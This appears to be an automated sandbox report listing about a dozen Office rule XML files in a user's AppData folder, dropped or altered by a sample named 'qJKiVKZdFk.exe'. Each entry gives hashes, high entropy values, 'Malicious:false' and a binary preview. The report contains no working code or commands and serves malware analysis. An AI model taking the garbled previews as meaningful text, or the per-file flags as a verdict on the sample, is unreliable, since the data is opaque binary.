                                                                                                                                      Preview:<?xml..Ci..._.+,....&..I{N#..w...(R...n.%.^.4.$F....R..s.._.T`..T..'.,q.`d.+T9..W..h..k...u....;. +.W.RT..d.....L..$.I.ys.I....;.....F..o.IEa..l.....x..1.H..q..4klA.!.+.5...../......,Y..k...n.fj...).m.s.y..)..N.......g...]...;...Fc.....g..5.....@....H.-6."Zq!.D..VC..d..&iQ."!...}.>.W...n...>.....tA..Dk.&P..a...q....9...c...]......k..e...Q.l....n.....&.RY....6.L.hw.Y.....'r..8.l.....E.\...=.FV.h.>.e.b.....#.M...t.]..4$....6}h...m...P.R;...S.O!...............0_z..^h..j.......<4.:..u.v..0..~.x:W..HD.g..]t......".7T..:1...;..U...R_}....Px@..]...F..3_..?.....L2..L...{.Cx..x....`.g.v..y<G......i...u"..l...5k.e...K.vF..h.B..^........u.|.r)...!....Nl.....f.4.aQ..#r..9<...G.{%........v..jy..iyPt{;....O.4...|.5.3x4Z9..)...5....J.In.h%:.....J..I........C....$.M.>......CqC..x..b..^...d.jm....u...aROe..D...ha.b.u...9...n...-.K3.m41.9....(........A.aq.N..........N...\...x.o.c.v.z..B.@....W."....n...a~o6j.'.Te...P..@|....".?...W.$&.?....0....r.RQ."K.@[

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700651v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1732
                                                                                                                                      Entropy (8bit):7.890058334033119
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:irrX3+LTgL/p8xHGevzP+ltkW/vMFgjRHMPiWXq/uVSD:2rnUE/emw7wOCCguPi0r6
                                                                                                                                      MD5:DB0F413CEF9D661F3E30A136B2453281
                                                                                                                                      SHA1:C999A97B7317B16C1BDE32820D21CC7956930D0B
                                                                                                                                      SHA-256:F176059E3389802B728434A483C290EC241BA8703B12AB481B08EEB065614026
                                                                                                                                      SHA-512:87CF5AD02DE33CFFC589C08D82A64A685A31DB73631A911D98408FB6C5E32D1D27381937483FB246DDC463A86A45C3915FD4E05EFFD0DC4E834C50881D532116
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....=~=.....v.......0x..K2...%...N...`V.u.. .DQ..........8.....YR.~4.z...$g.I|.j@......+....,.*....s.q...3.0[Fw .M.....Z........Q-h.l.I.wbV$......&.. ....H...?.-.v...7....S,.Y^.....J.....b.w.jpQ..m..f..jD.).R.....D.t..f.NS..9...H....D.....}Np%..0G.J..hC..$.Jv...8.......{F.W...L2R...Xu,.V...BM.[.p..{|H0..4..!...Q...9..$*...jg..s.f..D..K^A....+..p(.....6.".~.g...n.....L..../$.3..8.....QS.3......"T.~Z..p.>....d..F...yk...U....&...R....>..>!.......D....F.....o....'...iJ.Gx.%d...Z.N.K.,.#JbL..w......q~.....M.0!C.).cV.R.1rd.AP......1..<.'4IFx....Uk_.).Z..s..6}{.{.......>..dF....D.uEE.?>.]...W6.....Z..<."4F.$.Ai.4.Cf.6.../h..........Ob3....]..f...P./...=I....B...xz...D...,.P.lD..{$...@/..u...-S..k.O......../g..c.WC..@u........a....k..&...,.Y....F.`V.......4P..k#..:cW...P3DF.......+.9.~.m7dmW..1.......a..?..>On.J...]$.|..m.R......6...(#...SE...'.X..i..$..@..QzN.F.k~.../m.M.N.q..n.m.f..(c\.=...J..*.....8.Z....2..\..?..`...p.......O.lTp.[.nr..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700700v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1697
                                                                                                                                      Entropy (8bit):7.904983798453051
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:oTrCHtHsbFwSY6r2h68xmpWZtUNF68FgfA+RxAewXAHqEGj0kWp3q/ei/KPNhSQH:CuHtHW46668xVc6Y2/qmWKTNprD
                                                                                                                                      MD5:8BF471E27EBF712E7F1C2DF007DC8A43
                                                                                                                                      SHA1:BC8ED65C36957EAE26E5EDFB34F4806AFCF09D72
                                                                                                                                      SHA-256:2A8C0D1387512C8335F8AE8831428388994EF5ABD563D986FBB1D2BB19C7BF19
                                                                                                                                      SHA-512:0386177B1C382BD4C47689650908FEA33557AB639CC4EA5BC85072A307E56E5429991B33037923442C76EB75659C63BDDE3AEC19662D3564DDF95897D54DF352
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......y.. ^.K.Q=.Y..o.....eHX....:E.....|8.0;>. ..}Y.5..?.ua.f.....,.v.d...W..kL..G....z.I..d....o.....#2.Q...@...t.t....]....Nq.....W\.........v!|......%.....w.'...m..v.^.8SZ._NI.=%^.........M..Tv.8.uu..Ze...?<.r. ..X./~../..:=Sc.xN.u..M..|.i..u{.+.D...E\TB...X.F;..r....H~...I"....|..zp.~..;.U........x.......ei.cE.di.].......@.....$.......!..a.?..e3.<.j.....R;"~.?.<.]t..Q.[%.'.?!Q/..vk...1.....C.Z.K......O..Z..@a......_.r...d;j...Q.!.h(.7..\..F....}.....x@A....$.\.g}..m(...8...Ls...9/....|./..Z.<.......R.6....^0..Q.DK>...z.6||....F.Q..j.....w..gq..j.....O..=.].....T..L-.....n.8.A.M.&..4.x.*...o..1....Fjpc....&.~7.....c...e.5.Z.TP..0..W.mE..;.'....VW...,aw.S...l.......\3.U.Ym.i..D...lWK9wOOWV.&...2fe...G..X.1D.%.~.tK|U.\A.......E'..H.b....2...<CC..%.....-..J.MARb.d.Y.h..H..\VJ.)...ij[/.)vW..E.uC1_!...k.AP..L....o.em..i.j..!..Q..&.X.......................Y-J.\dy}..q..lw............1...y-(D..?.ZN...%.....".`gJM.........R.......P,

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700701v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1734
                                                                                                                                      Entropy (8bit):7.86489176205066
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:GnM4MZkxqsnN8z3fTN61CQpgEKgQQ1X/fEIr6D:EMtZ2qsUvTN61CWgo1vMI2
                                                                                                                                      MD5:0B565D3A964C210C8DF8D45E4C2CC872
                                                                                                                                      SHA1:086EB27236A3C7E84FEA762A945AD483744E7EFE
                                                                                                                                      SHA-256:2AC83ECC8A3E0619178E7B847B526DAB88FC16C025F08561EF9F150FB9769426
                                                                                                                                      SHA-512:18D767EEB2B44584BD65AFC7FEDABFFE6E6F2D733DB92CCD2F0C71EB846A6CD4579A96A76AEA4D636226D0D4688E5FF7676492B8816C96FA4969AD918EFF4F38
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml5...DD....Y^......l..;0.#.x.' d..T..............u......%8...Nd.@..gu.Y..""56..1....X.j.....t.Oc..j.o.O.5..Q..A.......g....]...<......v2b.;3.S........pe..K&.4}1....!]].........\.B.o...+'...~.%..T...}..c...D.Zn+...D...F.....P...^...3... .......|...Z.<...r.X...+5p.Xr.\..o.....t:"@....p...P.x....6.x%&.....JY4x.$.A.rYX.3I...8.2U.DR#..].94.a..L..9JP.....-.4..q....0..q.J.......A.N....=YL;19..rYg.;E....ZF.i.....a...2..X.-..3}.G.Lt.r/ V.U.J.....Ra.!.X[..?..>.X.ada9$..9o{.@ ..@./..."T..|a...(..;v0Hcm2x.I.....K.9...|......0.B}{p. .7..^....|(..e.}.....8,...gb..~.g.&p...Z...im.s.....C,.{...,.*.)W.ELC.HB.....JZ.YY\...S@..4o.(...w.F..In.m....*.of..[.F.6<gLv..o.1..}..-....~...W..R.~.;.....y." ...U..?...E.gHu.z..F8.G....m.j,..-.z,....)..q.fs9..a...=.f.dN.9Y.#...5....8.nG......S.;n....zC.bq.A...P...d...b.|/z..$.`.u.L.X..,4@....n._@>......".<Y&G../.c.|T.'..o...aB.l.....$zRz......l.Z..ZJ.\.Q....K.G.._..k...k..1..?~...w..{...un....b.W.[..K ..*......*.....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700750v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1710
                                                                                                                                      Entropy (8bit):7.878606287624159
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:BdisGM8LkGWXsjSDD+ks9KD9m8DHRsiSmGGQpD:n+M8LkGvSDD+OUUyiHpQB
                                                                                                                                      MD5:2981B1BA853C96043D273744510DFDCF
                                                                                                                                      SHA1:13F4408537A6A88671490E5E1BE471862F62E9B7
                                                                                                                                      SHA-256:E7585FF9676C6546B02415EFD7467D9F70F393C5DCD54D92D5B41E82A32CB902
                                                                                                                                      SHA-512:E4A66B9B40481BC2145604A6BA6AF6641BC13D30F4C34F8BD7370C82A14F6478617FC6D6DE86742F0D44F10E7025736C5867F745766DC3B5F184379A3379577F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....o..w.t5@..I..0. .u.'...z..U...j....~......T.5..G<.a.......Q..E..h.Q..........(.Ts.(w..._.c...r.$.......4L..N...j)>Z..rw..@.-..b.|.....l..7.m.....#........(`..Nhy&{...r..zF.z......N&...!.R9...fk..xU..kv....r..`k.\.b....3....-=CS.{......`.......\L.....2.Y.u.Cp..'... ......f..+E./....vb.*.e...;...;$.w.R.9..|.....%....l....S..9l.n....m-d..aYr!...{:9...a\{;..@..k|Dk`.F.O|.R..........H....i.y{.#Y.J....{5.wzQ.4.2....>.C....A.25m.B...K..H......./....5...&|Mt.!.....sV...>`.*O{.....f3.]....>.a.....pKK...S.a.}.......Q<.....k...'.:.....A.l.9#.wjPYf~...Jj.b.C.?y.......-...:...n....b...x..|.nS.&.g.3E.G7....OS1..t....I.k(..]...!.u.[..-_.^}W0HN.-......1d)...a'w...f,.W...&.\..IP....ZWJ..7...;.%..;..^9...M.R.K@.....G.a........~OH.,6.4.j...A../X\..u1...E'.p..A6E.J.zBT"}.....:..yr..$..:...H......Y...!.C...;..0V)...Q.uB..iffU.0.)..'f.nP..p....'k8..&..w.5E;.......l..'\:....)co...2}....ai..bpa.....N.d.+.C.tWp.Y...T.b...3.)T.qRe...d.C....j.p.#.:...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700751v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1747
                                                                                                                                      Entropy (8bit):7.887553084836252
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:uOxEzHCF39h7PIsnqlnT0W8AWROwcUEaHEvcfJaWblAzw/D:uYEjM3/dAT67DkvcxaWbiz8
                                                                                                                                      MD5:9CA9D44510250C8F1DF8B225B428D2F3
                                                                                                                                      SHA1:6E569FD525DA5DDB5DBF6E5FEE19D0A1A6BDC297
                                                                                                                                      SHA-256:9F575EA8764B0F7342859996559F76B9ECD3CF53ED3453A7307241122838B5A0
                                                                                                                                      SHA-512:3413FC78B681D9D45B2818CB85F2428FF50C2105B460752553D8FF7B323C2AC6682981030CAFC87579C41472363620A64DA806D805CECF38B1593F1FC5879E6F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlH..o....f/(....k.~.....7..e.}..~pH=.b.d.RR....K.....!...p.;..|o...k..U.....B...^.I..<...9.d......X.G...#8..g...P...n.u.........I.b`.kJ.+#0......x.6..D.f!\.y.W.Ns....p..T.62}.c. ..&......8.R..KU.../...{..uz..su...V..G`l..Y}GL..nD.u.....XE.b.J........].[.....CbI*.....c...eex{..[.~......00.h2*..p..yn@OW.6.q"..D%....I.#...&....8.Q%.P....#.5....^W;.c5.`.N.$............[Z+O)..!...V...Y!.....r..c..-.....K&&3Q.f%V\.A.$".....*H 1....X-......jn.J1....2.P...W)....a.]...u|....-0......d..<2.|.!a...A.q.........J....&O.0..]..8.l...n.......U.V...i.>.....U..8B....~o.......rW.v.`....iT...2.N.h..zY..G.....K^R...;.r.|......6........u(...X.}.\.z..F.....=..F6 ..Zg&..T.........SU.m.......-.J.C..d\....4.....&w.o;.jL.g.N./.h...g5..@.+#G.O]..|...T.uP;..G}.'............c.GiQ.....J..\'H.......%........pb..`.f.0..b.E.l"...._......;..Fg%*S.Sb...Q..>.+.u..-K.`n)...?ik....'...c.<.~0.....i.+...o..'...k..0T.=..0t......f[R...!...1X@.wps.B'.K(.........`)....]....v.'0.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700850v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1711
                                                                                                                                      Entropy (8bit):7.869982206788884
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:V22pbDE7EaLt4ut+sn4FgIjTv6uVEkzzwFaD:V/pHE79t/4FgIj3bnwk
                                                                                                                                      MD5:C918A7632E013711880150CE3614E8D9
                                                                                                                                      SHA1:BD1A15A3FBB0F1F4E957E83E7A04C87F67E59A15
                                                                                                                                      SHA-256:585CE73088FC0459389CDE04ECFA732F2B5EAE9888F19089FB7E7B0E16F41107
                                                                                                                                      SHA-512:A9B409E6E14EC6DE1D152151517137D7316137E2E6BE0A0129F6A2143CDD68E1D95C300D16D2D2B21D8AA9183725D05F7F1B361289F6FC8AD5F5012614F08583
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml?H.S.\=...G ..A...p~<..;Y&V.f"...7..$F3....v.<......=}?=.[1d..U..V...J.L.7....b.j..w.b~...SlIgS...........K.S.>...@t.^.k.Y.Y.Z/lp.nD.Q.{L.H.c.S.. l.X...5..>."L.....j*.&\...q.b]..1jC.>.=}q...^...A.p..<E8..>mU..a...b.9.N{...q...89....kEY.*"<eV.um.hG.9[..$.9.p........TX..S.....j..DC..._:.A..6..n..9..#.<.Gc.9...F".B...4..q.B.q9/B...3.T....c.;.'.v..Lp.!a..{.%!..:......a..E'C.......X...V.v;.......o[..r..V@.....l..4.......[.g.....P.Mkn.Zb.D#c-+~..............j...n.Z.G..... z..>g..../..:....>...S...Gwi3...Q....cw.+p.p.....4M_.t..N.mw.K...^....?&E7...b..O_.-..$h.7[g*X...tm.i....97..p.#.v+R.._.iJ...d.......-Rt..l....;....US.....t....N...[..h..>+.W5.t.....UG......@2....N.'A..f..am..a...6..[0..%.b.hz..zBh....$......fI.p..p.{...\.q.=.|......,.B..G..Z-$5.t.k.4.......Z.....$%B7.pA.zJ.xi"H.`.5.=.k)$'.n....?D5t..]/.A7...]......!...'.q2.uHwO..5o.>\..,.._._uz.. .}...=.Uy..V'\c.wB(..4..j...>....g..."hP..7..|...X...$P..[...\D|..bK..8.L...tN9R.Z4Lzb.r& .]Paf..X.?....t

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700851v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1748
                                                                                                                                      Entropy (8bit):7.884251945368731
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:QI/Fqb0GJFqhmhGfJ3o9WaE5bfZM1hrA89tw3HuD:1/FyPBIbO1hrp22
                                                                                                                                      MD5:BFFEA8C3AB93D2185DEA1D3B69028427
                                                                                                                                      SHA1:69495FE915DB480DF4D22D6340DF68294199CB5C
                                                                                                                                      SHA-256:15D61073463E2A5D2869FFE2623D52929D15B1DA79D60FA3C14B1015498A400F
                                                                                                                                      SHA-512:3CD87ECB6F3C4A90E17B501868D7154A01A9D4D0B1BA98F15506AE3EF528461ABA7AF85A825D53F5BF4DE13D6941DD7EDFCB94E34CB195CA1F4835C5957C16F3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.i,.G....F>!.IG..)..Cf..%E...)..+. ...'*Z...0.}sF.P.....K..2.?=]......6Cd.o$XW;...._.3........t.u.F.d..A.iS.|5......m.U.nk.r...E..Sd.O`..#..z.....o...<....."..[...Sh....6,_.#>.A.:=.+.8.-.Y.Z....|P.-....:.f..z...L.u.!...e.YE{.....m..<1...XuG....G'.J4.pv,...tp.4....Zj c..Rhr(..M....z.tw..1i.3b..........%.~........r...$..L...]....3..XR..f;o.....04..G..i?.qK...E._^OE.w..eCm....;.......H."...?.I....P..\.O....i..D....Sy. `..j..."+.L..H....b..q.h...\!.J..1+.....O......l...\/......../9>....]:..f_.nLU....!q.P....|.e..p8[.Y@......Y...="....%*.#g.1.wD..c}J.........#zL...b....ww{...l...l[.i?.........$......D.Xp.t..+z...7..L.i.....z........X....;8.k.,O..O....&..0 ...uh......r._.^...\..TucN^..%l.U.. ..,.PU.........^......a......TJJ.M.[.....E....*.\.....(.j.G.UC..._.J.....@....7J.....Y.c...?D....V.<....Vw.i.rfqi..q.!.."w~..;...p...7p.aUK...#,#..^6.~7.s..`.yq..+...^.\. u/DMj]...&.......ytD..f.t-..z..G3_S.mB.7..}.....W...|./....1.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700900v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1704
                                                                                                                                      Entropy (8bit):7.883252418058662
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:m+Ez7aLycKEv9XI7j9AFh1KR2a0FJqcwCSVifs5r6bJeNEopSWLxu/8Fnu14p2JU:wGLyy1XKjakN0vflNfmX5x68c4A1GD
                                                                                                                                      MD5:F340D3839621E23D533D6F78024A349F
                                                                                                                                      SHA1:2658FC833B78E118820F56038910011ECAC313DD
                                                                                                                                      SHA-256:ECEA94216AEBE6787FAB7E539DFF86F788D920EFB551CC5951A0DA10E84F30F5
                                                                                                                                      SHA-512:C3BBB96D84CD46E431E230A3BB980FBE4C30F8FBA06D09F986CC0BA88A0B6AA7056D6A92CF107E410897A8F171C1B2D1F74CCB6D60B383D4C823A1D6177A624F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml:.n.=8Y..w....=C.z9z......>@.........Y...N.M.a..4PM..P..L..ym.@.....e...9.;.8Qu0.r...&...ojL....=2.B...c..G.I.X.B.^Yym).{n.] BeL...cJL!h)f.~i{......+.D:.. ...,..W....7v..k..*.J..`|...D...S..Mx.Cae..Q..G.6}..4A`..h..x...z)B.U.g*X4:..Cu.O...\..{...Z.Q.C...Z.....F..>.&....O}m...$...f8fV.O......#pif...............?.)wH......QC..M\A.^..p.K.p.....9.0T~.`...n.@u:...........k].p..E......KF.0..O..G.YG3l.:..X./.C.d.t._.jk.c.....P.l...~@.6.a.`.x.{=Y.u.....J.,..}.X.W...S....n..Lgs_k....G...._\ w..*.}J...x.....Sf..|E....%:.q[!.....LZ...(..VX./....m.V4Y81D7w.*uL..Z8.....5L...2.JO..(...s...p.!;....,...../........N{Q../..c ......rAg..........|q....M......8....c....s....Z..G.`^..XIv.N.aW..p....{1....l.._...I.#p...f7.Ft.8...3.7.Q.y.f <1.H..w..?..wi..r..7...VD.=..S......o...b17....lEf.;A....<=Lx.=n........4..TAk...K^...8...k!.{.0K..w...Z%....nW..^.q..u.A..q%..ib_...K...>B.!"...B.......9.q'.%.|+.VG.d0.....p+.nf..C....Mt.H...UX..w,*.~.bb.a.!d...\X.i.A..v.....\A..9V.a

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700901v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1741
                                                                                                                                      Entropy (8bit):7.874620939600638
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:sHeGPQviJTsQiOhK7O6yqxeRREdMl/suMPZfjbvOeSRyMq+crVNWw0hkGNSglUaE:s1YvCkO66gM9suENLO1tq2tSmy0uhD
                                                                                                                                      MD5:A561C0BAB5748C4175751223824F1591
                                                                                                                                      SHA1:7D0F526EA71246AB0B6E5723FBFA7E495BAB91BA
                                                                                                                                      SHA-256:91E4C57126B604508A695A793F0616DA7750D59595135342E36DF5596DE3A9F4
                                                                                                                                      SHA-512:A7B2BF2BBB5494D7E89464133C756ADB0DB7919B5AE7974D555935F330224089DA55435F947A7C83891EEC674C7A5C124AE88633FE1CAB7DE09105EC1DE11973
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..mQ]...e.X....S&$b.=.fHV.....C..gRP...tE....XMLj.ob...p..k...'.>4Z.......o.....m..n..?!>...<t.T@.&M#a.jT._?,7L...@GMA...7w..z .`........v..>6..d'm.._.. m..X...Z.e................U&-.KqJ..~.8.f...Chk......F.c.]...X...W......xW8..Mrf./Z....CW#.Q@F..,./qt.EQ.3B..%......A.i]..R..."j.X....>..E....u]R.E.J...^.)..?.G0/..o.....<..M...D....o{..i.J...O...Q...D}sI5..NW.....v1.V7..?......z.EI..M..cC,n.....v.......7B.b!..c...bS..D2 .DNK(u.."...|.SwA..|.?.........1..e.u..`.P....A;.b.C...g.G....K....8..h.Lsn@.M;.P..N.6.Z^...6S_.g..W.>..B.'8.0X.G.4...X......&.4%.C.L.k]RS.7K.!.7{.X.3......g...8.."..y...e.?.............Y.9..q.........j_..*-.X.h...|q..9..|......J...0...@r..K...q......x7..mpp.ZT....1I..V...b,...j........Z....S..G......z......wy...e-._..."....~.\.......e}.P.w.M.;x.JQ..3F..)0871..Z.[..&.....h.!.Tr.rb'...,.zO.&#o.S[..r..Kr.t....Q..5...P......{*!..n.EV.b#.e..q..g..4.).&B.'T....*..b...m.N....sLCx.>....#H..+..........o/...z....%..W.Z1..&.T@..!..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700950v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.887639676511252
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:AVi20k3y6wj6DSCaOom2FvN6qrGdU0y8V1M6vwUueiJB34oOUPkhSdTRybD:AViSrwemCgbrGdby8f7vw3eiJBZ50SED
                                                                                                                                      MD5:022D46D94781C19431A671BA7D51645A
                                                                                                                                      SHA1:3AFB02BA95B61258A126950921439D61E76BE752
                                                                                                                                      SHA-256:DF334B357A1FD5157C4BBEE03534A3D240A9CFDFF7E83DA01D67026085AA0EDB
                                                                                                                                      SHA-512:0A40E4F14ADAB8B769769C09473B3E116DBD64194B15B1BA99BA7E37D99D262DAA9C380E57B12D1977E2DEAB7CD00B1837BE451572757381BB3E4D9E14C4E0E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlT.@ .H..C...-........4..G...h.S......9Z....J...}l.ms.<'0..^.......|.WA..'.......G^....P.h._.!........$x..p6..F.j....{..L.M.^.....(.3...t6...@....N#..b..I.\pR.I.'....!......h..&....H......:4.......G.....+.....Q5$^....EE..x.79.h}k%.c.Z.@.&1z'tH.r ...Q^...00.......U........N.g.....o.R...E...?..w.....Q_..n...U..yi4..b.{}[.4.0.]...t.M....L..h/....`.t...6......W"X|......j..e.t....a6...+.+..=....J.c.O....]lP........J.b.......>^..B..B....?.. .z..'....uV.Cq.B.KB...K.M..U0..S....Z;.M-..+.E..!n.I..u1At../.^.R..T.?..,$......s.....%.....+....XN......oF....Ez.e.={i..........H3hd.Z;4Q.F%.T....Tco!TN.x]....r,..o..=.t.=/....r!/..e..G..y...&o.....!.3..5.......y..q&..=....a...N..M....hj......-."!.V..r<NC....U......=.f!SA.h.....+..y.....]O..RB..j.;../R...'.....g...'........}.l.?..Y.B....l.[.[.....hJOo.F[...3.m..Zb.....E.....[..u./.D..x....x...Lx.......|C.d3..jQ..e ..}H..HvWm....2.d.]j.z:.x..a.#...hsY...F._.e..3.j....B...~.2...#...s3..uOC..@...k...*....w

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700951v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1739
                                                                                                                                      Entropy (8bit):7.883726607672834
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:bWfqVNqg6fHkKqvYLKSOWfGxC1yALclcBEpwTD:bAqNBjbA2gWC19LclcBEp8
                                                                                                                                      MD5:0D194CEF89F995E811E7725701D82485
                                                                                                                                      SHA1:04C1D0EDC8A186910219604D8ACE608C8908DB10
                                                                                                                                      SHA-256:C38DFD6FD36CFF0693A3FCA6AE973587E9910D4B5AED6FB8B208EA3E97A17A11
                                                                                                                                      SHA-512:B5F7C056B89575F3A3C54C361B037A301C8740866D04EC3FEE05CB48C1D0CDD3065B556530E66AFA252E39BE2FB9E1433443F27079F5F6234CA76469BB839623
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....7.v{.)..7cB..1.*..w.....*..df3.MK.YP.H..D\..+...a7..'F..\f.....&..._.}FU:......=w.M.c..2w..2>p..p.......X+..S..L..#.N..C..Ut.u.....\?_.)$....p....b..B.P.Q.>....y[:.r.2.T..F....q9.S"#2O........R......bF.h..)h..'1PG^.../z.\.`._s.3M.HbP].$h.&j%qEI9.x..-....i6`).L..UHe...)o..Yg?.........`.........ve..... .X...7;..\....R...oX.5.<p.1c..~..Py....:H...L......OA.z...l.u....._ET.q._.ZE..#....B#.#...n....}.f..H.\..d.Q;s..S.W....5..p..]-......*>...i..V&T......D..:_D...|...........4.w.$k.. .2....L..d=..)j....F......3....oC.l.Y..a.u...a.X..i.._(@.......my..x...;.k......"[.X.......j (.77W..edS/..u.......u..j.P.'w.}........ulhm....~rF>z...E$..Q~.y.~.I(.B..&.S.".pRoI.....N...g<f}......+...c.~....c.. ..8.....d%+#..x.Zp~..."..bJ......a...W.qs...m.9ml~].0P:1..Y55.....v:JZ.....C...=..<.=...;....].\.u..)......3...$.H...#....(.v......#8..../...,.]i'}..=76S.gFD<...nIy.H.......&.S..[[.U...f.5.F.:.`L.....b.s.M...Xf....S.fV.].s..T=S..r."!..R...<..p.).KHg.j

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701050v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1695
                                                                                                                                      Entropy (8bit):7.870018813977911
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Zt2TowxwpUjTKfGx+6uT/ZTuz56fJdU9GD:PuDMUjTKfGqPfJSo
                                                                                                                                      MD5:2CA9E863CC4E3421F9E7887BAA29B720
                                                                                                                                      SHA1:721741E6DEF55D76780056ED8AE98884F617CD53
                                                                                                                                      SHA-256:FA4B017F0A07B80AC17E94EB6677643D63BB7A879F3AEA3F2B43729B29B9C3B1
                                                                                                                                      SHA-512:62E40846F634456C5F6FA7F737B91FDFAD3F792A9DDE90B536AE08C6E18E59612F3B0116179AA796153E7DE62D262FEA1C03CF70B2135FF04EFC485B9744850D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml7-...Hs...!.)'..B.o.)...WOT.....h.D....Ax.`B.F..(Y..<f[.c.T...].-.+.....#.Vx.]b....HFs+!.=..j......U@....w.I.%pp.#.....m#>!.&....n.8t.DW[...F..$>o.._fg..O...f...m..p.4^.......m..W.m`./6.{<uM.L..\.....#..a.r...:u.7..`......p.%(7n.x.C..n.{_...E.k...........(...k..FF#....b..f.....K.......a...b....jOj..|!/:x'.y........~...&.&.N.v..R....e..U..G.(.:..{N_._M&..s.n[.....^.)P..G4.!..~c...........&.9UZ......V.l.I.....j.+....3.C.....}t$t.`s.>n...$..aC...B....Vy..T.op0....(s\L...Q.P...z.;..z.2...Y.....`(7.R^.C..9.l\...2.=E...,#.9R..L....d.amc.F'....j)r>.7;..{..)Hl"X.......W.Y.s..@L..qA.h....5(RZ..j.. D.~v(....w..t7P....N7...e..-U.M.2.X.AJ.N|B...\..J.....}..<T.X.x(|...8MS...'.}.?.....Le...CDe#w...3.Zc..[.~.e._.%.V......9Z.,.0...s.Q......^:u...(`...a8......[...#.s...srm..LPHx.G...=...8....WUw^.:..a...3.m.U.sV..L...s...a.....F.....}!o.r..Y.1.W...4p1+;7... e..=...;.;...Z..x....x.*.........e.....>$.u5<...$rI.'K;..6.VL..(4.~.F<Q.Jg<8.<y._...U.&.....+.....

